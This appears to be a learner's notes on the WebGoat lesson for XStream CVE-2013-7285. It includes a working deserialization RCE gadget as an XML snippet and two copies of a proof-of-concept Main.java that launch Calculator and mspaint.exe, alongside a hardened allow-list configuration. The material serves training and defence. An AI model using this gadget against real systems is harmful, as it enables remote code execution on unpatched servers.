XStream can be used for Remote Code Execution.
Reference: XStream - CVE-2013-7285, https://x-stream.github.io/CVE-2013-7285.html
Affected versions (from the advisory): all versions up to and including 1.4.6 are affected, but a workaround exists.
Description
- At unmarshalling time the processed stream contains type information used to recreate the formerly written objects, so XStream creates new instances based on that type information. An attacker can manipulate the processed input stream and replace or inject objects that execute arbitrary shell commands.
(unmarshalling: reading XML and creating Java objects from it)
(marshalling: converting Java objects to XML)
Steps to Reproduce
- Create a simple interface, e.g. named Contact, and an implementation class. Use XStream to marshal such an object to XML. Replace the XML with the following snippet and unmarshal it again with XStream:
<contact class='dynamic-proxy'>
  <interface>org.company.model.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

XStream xstream = new XStream();
Contact contact = (Contact) xstream.fromXML(xml);
- The payload executes as soon as the code calls any method on the Contact object, e.g. contact.getFirstName().
WebGoat uses an XML document to add contacts to a contacts database. A contact is serialized as follows:
<contact>
  <id>1</id>
  <firstName>Bruce</firstName>
  <lastName>Mayhew</lastName>
  <email>webgoat@owasp.org</email>
</contact>
The Java interface needed for this lesson: org.owasp.webgoat.vulnerable_components.Contact. First send the contact above to confirm a normal response, then read the CVE vulnerability description (search the internet) and trigger the vulnerability. In this lesson you can enter the XML directly and modify the data. WebGoat converts the contact XML into a Contact object with XStream.fromXML(xml).
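As an added example (not code from the advisory, WebGoat or pwntester's repository), the fromXML sink above can be hardened with XStream's security framework (available since 1.4.7): deny every type first, then re-allow only what a contact document needs. The Contact class and both input documents below are constructed stand-ins; the "hostile" one only reuses the class attribute from the advisory's snippet.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SafeContactUnmarshal {

    /** Constructed stand-in for the lesson's Contact model, not WebGoat's own class. */
    public static class Contact {
        int id;
        String firstName;
        String lastName;
        String email;
    }

    /** XStream instance that only instantiates an explicit allow-list of types. */
    public static XStream hardenedXStream() {
        XStream xstream = new XStream(new DomDriver());
        xstream.alias("contact", Contact.class);
        // Deny everything, then re-allow null, primitives/boxes, String and the model.
        xstream.addPermission(NoTypePermission.NONE);
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Contact.class });
        return xstream;
    }

    /** Parsed contact, or null when the document names a type outside the allow-list. */
    public static Contact parse(String xml) {
        try {
            return (Contact) hardenedXStream().fromXML(xml);
        } catch (ForbiddenClassException e) {
            // dynamic-proxy, EventHandler, ProcessBuilder, ... are rejected by name
            // before any instance exists, so no method on them can ever be invoked.
            System.err.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed benign input, same shape as the WebGoat contact document.
        String benign = "<contact><id>1</id><firstName>Bruce</firstName>"
            + "<lastName>Mayhew</lastName><email>webgoat@owasp.org</email></contact>";
        // Constructed input that asks for a proxy; it is stopped at the type name.
        String hostile = "<contact class='dynamic-proxy'><interface>java.lang.Comparable"
            + "</interface><handler class='java.beans.EventHandler'/></contact>";
        System.out.println("benign parsed: " + (parse(benign) != null));   // true
        System.out.println("hostile parsed: " + (parse(hostile) != null)); // false
    }
}
```

A ForbiddenClassException in the application log is also a useful detection signal: legitimate clients never send a class attribute on a contact document.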
Reference: GitHub - pwntester/XStreamPOC: POC for XStream RCE, https://github.com/pwntester/XStreamPOC/blob/master/src/main/java/com/pwntester/xstreampoc/Main.java
Reference: RCE via XStream object deserialization, http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
git reset --hard 70cbf
git log
Main.java
package com.pwntester.xstreampoc;

import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import java.beans.EventHandler;
import java.util.Set;
import java.util.TreeSet;

/**
 * Created with IntelliJ IDEA.
 * User: alvaro
 * Date: 23/12/13
 * Time: 13:39
 * To change this template use File | Settings | File Templates.
 */
public class Main {
    public static void main(String[] args) throws IOException {
        XStream xstream = new XStream(new DomDriver()) {{
            processAnnotations(Contact.class);
        }};

        // Serialization side: build the gadget as Java objects to see its XML form
        Set<Comparable> set = new TreeSet<Comparable>();
        set.add("foo");
        // Added after "foo": a TreeSet orders its elements, so inserting the proxy
        // makes the set call compareTo on it, which EventHandler forwards to
        // ProcessBuilder.start(). Here the target is the macOS Calculator.
        set.add(EventHandler.create(Comparable.class, new ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator"), "start"));
        //String payload2 = xstream.toXML(set);
        //System.out.println(payload2);

        // Deserialization side: the same gadget written by hand as XML
        String payload = "<sorted-set>" +
            "<string>foo</string>" +
            "<dynamic-proxy>" +
            "<interface>java.lang.Comparable</interface>" +
            "<handler class=\"java.beans.EventHandler\">" +
            "    <target class=\"java.lang.ProcessBuilder\">" +
            "        <command>" +
            // changed: command to run
            "            <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
            "        </command>" +
            "    </target>" +
            "    <action>start</action>" +
            "</handler>" +
            "</dynamic-proxy>" +
            "</sorted-set>";
        // fromXML returns the TreeSet, so this cast fails with a ClassCastException,
        // but the gadget has already fired while the set was being rebuilt.
        Contact c = (Contact) xstream.fromXML(payload);
    }
}
cmd : where mspaint
Attack code: main.java
package com.pwntester.xstreampoc;

import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import java.beans.EventHandler;
import java.util.Set;
import java.util.TreeSet;

/**
 * Created with IntelliJ IDEA.
 * User: alvaro
 * Date: 23/12/13
 * Time: 13:39
 * To change this template use File | Settings | File Templates.
 */
public class Main {
    public static void main(String[] args) throws IOException {
        XStream xstream = new XStream(new DomDriver()) {{
            processAnnotations(Contact.class);
        }};

        //Set<Comparable> set = new TreeSet<Comparable>();
        //set.add("foo");
        //set.add(EventHandler.create(Comparable.class, new ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator"), "start"));
        //String payload2 = xstream.toXML(set);
        //System.out.println(payload2);

        // Same gadget as above, with the command changed to the Windows path found via "where mspaint"
        String payload = "<sorted-set>" +
            "<string>foo</string>" +
            "<dynamic-proxy>" +
            "<interface>java.lang.Comparable</interface>" +
            "<handler class=\"java.beans.EventHandler\">" +
            "    <target class=\"java.lang.ProcessBuilder\">" +
            "        <command>" +
            "            <string>C:\\Windows\\System32\\mspaint.exe</string>" +
            "        </command>" +
            "    </target>" +
            "    <action>start</action>" +
            "</handler>" +
            "</dynamic-proxy>" +
            "</sorted-set>";
        // fromXML returns the TreeSet, so this cast fails with a ClassCastException,
        // but the gadget has already fired while the set was being rebuilt.
        Contact c = (Contact) xstream.fromXML(payload);
    }
}
xstream-1.4.6.jar is required - download it from the cafe - extract only thoughtworks under com
Ugh... the compile doesn't run...